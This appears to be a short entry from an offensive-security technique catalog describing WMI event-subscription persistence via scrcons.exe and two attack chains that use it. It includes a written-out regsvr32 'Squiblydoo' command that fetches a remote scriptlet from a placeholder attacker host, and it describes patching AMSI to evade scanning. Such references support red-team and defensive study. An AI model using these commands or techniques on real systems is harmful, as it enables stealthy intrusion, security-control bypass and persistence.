LOL-SCRCONS · Persistence
scrcons.exe WMI Event Subscription
A permanent WMI event subscription fires arbitrary VBS / JS at logon or on an interval: classic stealthy persistence.
§ Where this technique fits
LOL-SCRCONS is catalogued under the Persistence tactic of the offensive-security kill-chain. It appears in 2 approved dossiers in the registry, at step 5.5 on average.
§ Dossiers chaining this technique
- step 5 / 5
Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it is a Microsoft-signed binary, so the attacker's JS runs in its context.
- step 6 / 6
AMSI patch → in-memory .NET / PowerShell stager
Patch AmsiScanBuffer in amsi.dll → return clean for any content. Subsequent PowerShell / Office VBA / .NET runtime calls then run attacker code without scanning.